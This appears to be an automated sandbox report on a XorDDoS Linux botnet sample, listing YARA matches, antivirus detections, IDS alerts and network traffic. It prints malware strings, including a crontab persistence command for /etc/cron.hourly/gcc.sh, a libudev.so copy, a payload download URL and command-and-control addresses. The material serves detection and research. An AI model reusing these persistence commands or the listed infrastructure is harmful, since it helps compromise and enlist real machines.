        • 0x6b1e4:$st0: BB2FA36AAA9541F0
        • 0x6b1f4:$st0: BB2FA36AAA9541F0
        • 0x6b204:$st0: BB2FA36AAA9541F0
        Click to see the 36 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        5313.1.000000001a887bdc.00000000989094f2.r-x.sdmpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
          5313.1.000000001a887bdc.00000000989094f2.r-x.sdmpMALWARE_Linux_XORDDoSDetects XORDDoSditekSHen
          • 0x863fb:$s1: for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
          • 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6
          • 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab
          • 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
          5337.1.000000001a887bdc.00000000989094f2.r-x.sdmpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
            5337.1.000000001a887bdc.00000000989094f2.r-x.sdmpMALWARE_Linux_XORDDoSDetects XORDDoSditekSHen
            • 0x863fb:$s1: for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
            • 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6
            • 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab
            • 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
            5428.1.000000001a887bdc.00000000989094f2.r-x.sdmpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
              Click to see the 225 entries

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: 0Xorddos.oAvira: detected
              Multi AV Scanner detection for submitted file
              Source: 0Xorddos.oVirustotal: Detection: 66%Perma Link
              Source: 0Xorddos.oMetadefender: Detection: 67%Perma Link
              Source: 0Xorddos.oReversingLabs: Detection: 83%
              Antivirus detection for dropped file
              Source: /usr/bin/njezqqgxiuAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/uqxezzsakxAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/ysrkbnorklAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/cukrqcagnzAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/cvvhpkxdykAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/tngemhgnzkAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/qizbpqmtbiAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/lib/libudev.soAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/cvltgpdmgkAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/zareoppgxhAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/gbsknxiwipAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/gpcmhoiszuAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/aoyymackpmAvira: detection malicious, Label: LINUX/Xorddos.cona
              Source: /usr/bin/wzulpfbuxkAvira: detection malicious, Label: LINUX/Xorddos.cona
              Machine Learning detection for dropped file
              Source: /usr/bin/njezqqgxiuJoe Sandbox ML: detected
              Source: /usr/bin/uqxezzsakxJoe Sandbox ML: detected
              Source: /usr/bin/ysrkbnorklJoe Sandbox ML: detected
              Source: /usr/bin/cukrqcagnzJoe Sandbox ML: detected
              Source: /usr/bin/cvvhpkxdykJoe Sandbox ML: detected
              Source: /usr/bin/tngemhgnzkJoe Sandbox ML: detected
              Source: /usr/bin/qizbpqmtbiJoe Sandbox ML: detected
              Source: /usr/lib/libudev.soJoe Sandbox ML: detected
              Source: /usr/bin/cvltgpdmgkJoe Sandbox ML: detected
              Source: /usr/bin/zareoppgxhJoe Sandbox ML: detected
              Source: /usr/bin/gbsknxiwipJoe Sandbox ML: detected
              Source: /usr/bin/gpcmhoiszuJoe Sandbox ML: detected
              Source: /usr/bin/aoyymackpmJoe Sandbox ML: detected
              Source: /usr/bin/wzulpfbuxkJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: 0Xorddos.oJoe Sandbox ML: detected
              Source: /tmp/0Xorddos.o (PID: 5222)Reads CPU info from proc file: /proc/cpuinfoJump to behavior

              Networking

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
              Source: TrafficSnort IDS: 2021336 ET TROJAN DDoS.XOR Checkin via HTTP 192.168.2.23:57652 -> 54.36.15.99:80
              Source: TrafficSnort IDS: 2020381 ET TROJAN DDoS.XOR Checkin 192.168.2.23:45968 -> 54.36.15.99:53
              Source: global trafficTCP traffic: 192.168.2.23:53168 -> 176.31.91.137:53
              Source: global trafficTCP traffic: 192.168.2.23:45968 -> 54.36.15.99:53
              Source: global trafficTCP traffic: 192.168.2.23:46646 -> 46.105.84.190:53
              Source: global trafficTCP traffic: 192.168.2.23:38664 -> 51.89.52.12:53
              Source: global trafficTCP traffic: 192.168.2.23:38656 -> 51.89.52.12:53
              Source: global trafficTCP traffic: 192.168.2.23:38648 -> 51.89.52.12:53
              Source: global trafficTCP traffic: 192.168.2.23:33252 -> 79.137.1.132:53
              Source: global trafficTCP traffic: 192.168.2.23:33268 -> 79.137.1.132:53
              Source: global trafficTCP traffic: 192.168.2.23:41926 -> 54.36.145.106:53
              Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
              Source: unknownTCP traffic detected without corresponding DNS query: 51.89.52.12
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
              Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
              Source: unknownTCP traffic detected without corresponding DNS query: 51.89.52.12
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
              Source: unknownTCP traffic detected without corresponding DNS query: 51.89.52.12
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
              Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
              Source: 0Xorddos.o, njezqqgxiu.11.dr, uqxezzsakx.11.dr, ysrkbnorkl.11.dr, cukrqcagnz.11.dr, cvvhpkxdyk.11.dr, tngemhgnzk.11.dr, qizbpqmtbi.11.dr, libudev.so.11.dr, cvltgpdmgk.11.dr, zareoppgxh.11.dr, gbsknxiwip.11.dr, gpcmhoiszu.11.dr, aoyymackpm.11.dr, wzulpfbuxk.11.drString found in binary or memory: http://www.gnu.org/software/libc/bugs.html
              Source: 0Xorddos.o, 5221.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5223.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5224.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5225.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5254.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5259.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5261.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5264.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5267.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5273.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5276.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5279.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5281.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5284.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5291.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5294.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5296.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5299.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5302.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5308.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5311.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar
              Source: 0Xorddos.o, 5221.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5223.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5224.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5225.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9/t
              Source: 0Xorddos.o, 5401.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5404.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5407.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5410.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5412.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ao
              Source: 0Xorddos.o, 5273.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5276.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5279.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5281.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5284.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9cu
              Source: 0Xorddos.o, 5326.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5329.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5332.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5334.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5337.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5472.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5475.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5478.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5480.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5482.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9cv
              Source: 0Xorddos.o, 5509.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5512.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5515.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5517.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5521.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9cx
              Source: 0Xorddos.o, 5418.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5421.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5423.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5426.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5428.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9gb
              Source: 0Xorddos.o, 5435.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5438.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5441.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5444.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5446.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9gp
              Source: 0Xorddos.o, 5363.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5366.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5369.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5371.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5374.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9nj
              Source: 0Xorddos.o, 5489.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5492.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5495.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5498.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5502.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9os
              Source: 0Xorddos.o, 5526.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5529.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5532.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5534.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5537.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9qf
              Source: 0Xorddos.o, 5455.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5458.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5460.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5463.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5466.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9qi
              Source: 0Xorddos.o, 5345.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5348.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5350.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5353.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5356.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9tn
              Source: 0Xorddos.o, 5254.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5259.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5261.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5264.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5267.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9uq
              Source: 0Xorddos.o, 5384.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5387.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5389.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5392.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5395.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wz
              Source: 0Xorddos.o, 5546.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5549.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9yf
              Source: 0Xorddos.o, 5291.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5294.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5296.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5299.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5302.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ys
              Source: 0Xorddos.o, 5308.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5311.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5313.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5316.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmp, 0Xorddos.o, 5319.1.00000000c1b1ea55.000000007e7cb5bb.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9za
              Source: unknownDNS traffic detected: queries for: www1.gggatat456.com
              Source: global trafficHTTP traffic detected: GET /dd.rar HTTP/1.1Accept: */*Accept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)Host: www1.gggatat456.comConnection: Keep-Alive

              DDoS

              barindex
              Yara detected XorDDoS Bot
              Source: Yara matchFile source: 0Xorddos.o, type: SAMPLE
              Source: Yara matchFile source: 5313.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5337.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5428.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5316.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5546.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5455.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5356.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5412.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5532.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5261.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5267.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5225.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5426.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5407.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5438.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5273.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5345.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5537.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5291.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5401.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5512.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5296.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5480.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5418.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5435.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5311.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5223.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5463.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5332.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5294.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5284.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5444.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5224.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5404.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5515.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5466.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5389.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5395.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5421.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5326.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5363.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5534.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5308.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5276.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5366.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5526.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5478.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5302.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5552.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5387.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5495.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5279.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5529.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5329.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5482.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5509.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5492.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5441.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5374.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5472.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5264.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5410.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5348.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5319.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5475.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5281.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5502.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5521.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5254.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5299.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5392.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5517.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5369.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5460.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5334.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5259.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5446.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5549.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5384.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5458.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5498.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5423.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5371.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5489.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5353.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5350.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 5221.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5221, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5223, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5224, type: MEMORYSTR
